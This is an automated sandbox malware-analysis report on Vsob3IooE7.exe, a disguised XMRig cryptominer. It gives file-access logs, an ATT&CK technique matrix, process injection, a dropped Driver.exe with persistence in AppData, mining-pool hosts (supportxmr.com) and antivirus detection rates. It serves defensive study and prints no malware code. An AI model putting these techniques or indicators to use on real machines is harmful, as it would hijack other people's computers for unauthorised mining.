        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Users\user\Desktop\Vsob3IooE7.exe VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exe VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Roaming\Sysfiles\Vsob3IooE7.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\Desktop\Vsob3IooE7.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsWindows Management Instrumentation21
        Registry Run Keys / Startup Folder        		111
        Process Injection        		1
        Masquerading        		1
        Input Capture        		21
        Security Software Discovery        		Remote Services1
        Input Capture        		Exfiltration Over Other Network Medium1
        Encrypted Channel        		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts21
        Registry Run Keys / Startup Folder        		1
        Disable or Modify Tools        		LSASS Memory1
        Process Discovery        		Remote Desktop Protocol1
        Archive Collected Data        		Exfiltration Over Bluetooth1
        Non-Standard Port        		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)21
        Virtualization/Sandbox Evasion        		Security Account Manager21
        Virtualization/Sandbox Evasion        		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
        Non-Application Layer Protocol        		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
        Process Injection        		NTDS1
        Remote System Discovery        		Distributed Component Object ModelInput CaptureScheduled Transfer1
        Application Layer Protocol        		SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
        Obfuscated Files or Information        		LSA Secrets1
        File and Directory Discovery        		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Timestomp        		Cached Domain Credentials12
        System Information Discovery        		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 873923 Sample: Vsob3IooE7.exe Startdate: 23/05/2023 Architecture: WINDOWS Score: 100 41 Sigma detected: Xmrig 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 Yara detected AntiVM3 2->45 47 6 other signatures 2->47 8 Vsob3IooE7.exe 3 2->8         started        12 Vsob3IooE7.exe 2 2->12         started        14 Vsob3IooE7.exe 2->14         started        16 Vsob3IooE7.exe 2->16         started        process3 file4 35 C:\Users\user\AppData\...\Vsob3IooE7.exe.log, ASCII 8->35 dropped 49 Injects a PE file into a foreign processes 8->49 18 Vsob3IooE7.exe 1 4 8->18         started        21 Vsob3IooE7.exe 8->21         started        23 Vsob3IooE7.exe 8->23         started        signatures5 process6 file7 31 C:\Users\user\AppData\Roaming\...\Driver.exe, MS-DOS 18->31 dropped 33 C:\Users\user\AppData\Roaming\...\Driver.url, MS 18->33 dropped 25 Driver.exe 1 18->25         started        process8 dnsIp9 37 pool-fr.supportxmr.com 141.94.96.144, 3333, 49715 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 25->37 39 pool.supportxmr.com 25->39 51 Multi AV Scanner detection for dropped file 25->51 53 Machine Learning detection for dropped file 25->53 29 conhost.exe 25->29         started        signatures10 55 Detected Stratum mining protocol 37->55 process11

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        Vsob3IooE7.exe22%ReversingLabs
        Vsob3IooE7.exe24%VirustotalBrowse
        Vsob3IooE7.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe100%Joe Sandbox ML
        C:\Users\user\AppData\Roaming\Sysfiles\Driver.exe71%ReversingLabsWin64.Trojan.DisguisedXMRigMiner

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://www.jiyu-kobo.co.jp/://w0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/://w0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
        http://www.tiro.com0%URL Reputationsafe
        http://www.goodfont.co.kr0%URL Reputationsafe
        http://www.sajatypeworks.com0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
        http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe
        http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
        http://)/cmd.cgi?cmd=REL0%Avira URL Cloudsafe
        http://www.sandoll.co.kr0%URL Reputationsafe
        http://www.urwpp.deDPlease0%URL Reputationsafe
        http://www.urwpp.de0%URL Reputationsafe
        http://www.zhongyicts.com.cn0%URL Reputationsafe
        http://www.sakkal.com0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/icro0%URL Reputationsafe
        http://www.galapagosdesign.com/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/X0%URL Reputationsafe
        http://www.fontbureau.comF0%URL Reputationsafe
        http://www.urwpp.de9h0%Avira URL Cloudsafe
        http://www.sajatypeworks.comwdth0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/jp/Zw0%Avira URL Cloudsafe
        http://www.ascendercorp.com/typedesigners.html(0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/Cw0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/hw0%Avira URL Cloudsafe
        http://www.fontbureau.comueTF0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
        http://www.carterandcone.coml0%URL Reputationsafe
        http://www.urwpp.deeg0%URL Reputationsafe
        http://www.founder.com.cn/cn/0%URL Reputationsafe
        http://www.founder.com.cn/cn0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/Y0/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/r0%URL Reputationsafe
        http://www.monotype.0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/6w0%Avira URL Cloudsafe
        http://www.fontbureau.como0%URL Reputationsafe
        http://www.fontbureau.comalic0%URL Reputationsafe
        http://www.fontbureau.comue90%URL Reputationsafe
        http://www.jiyu-kobo.co.jp/(w0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/Zw0%Avira URL Cloudsafe
        http://192.168.100.115/cmd.cgi?0%Avira URL Cloudsafe
        http://www.jiyu-kobo.co.jp/~w0%Avira URL Cloudsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        pool-fr.supportxmr.com
        		141.94.96.144
        		truefalse
          		high
          pool.supportxmr.com
          		unknown
          		unknownfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.jiyu-kobo.co.jp/://wVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            		unknown
            http://www.fontbureau.com/designersGVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              http://www.fontbureau.com/designers/?Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://www.founder.com.cn/cn/bTheVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://www.sajatypeworks.comwdthVsob3IooE7.exe, 00000000.00000003.391553068.000000000627B000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.jiyu-kobo.co.jp/hwVsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://)/cmd.cgi?cmd=RELVsob3IooE7.exefalse
                • Avira URL Cloud: safe
                		low
                http://www.fontbureau.com/designers?Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://www.jiyu-kobo.co.jp/CwVsob3IooE7.exe, 00000000.00000003.395375546.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395186910.000000000627A000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000003.395078810.0000000006265000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://www.tiro.comVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                  • URL Reputation: safe
                  		unknown
                  http://www.fontbureau.com/designersVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://www.goodfont.co.krVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.sajatypeworks.comVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.typography.netDVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.founder.com.cn/cn/cTheVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/staff/dennis.htmVsob3IooE7.exe, 00000000.00000003.424132747.0000000006260000.00000004.00000020.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://fontfabrik.comVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.galapagosdesign.com/DPleaseVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://www.ascendercorp.com/typedesigners.html(Vsob3IooE7.exe, 00000000.00000003.395584229.000000000626C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.jiyu-kobo.co.jp/jp/ZwVsob3IooE7.exe, 00000000.00000003.395241732.000000000627A000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.urwpp.de9hVsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://www.fonts.comVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://www.sandoll.co.krVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deDPleaseVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.urwpp.deVsob3IooE7.exe, 00000000.00000003.396175898.000000000626C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://www.zhongyicts.com.cnVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameVsob3IooE7.exe, 00000000.00000002.430553510.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Vsob3IooE7.exe, 00000006.00000002.448788250.0000000002E31000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.sakkal.comVsob3IooE7.exe, 00000000.00000002.595110447.0000000007372000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
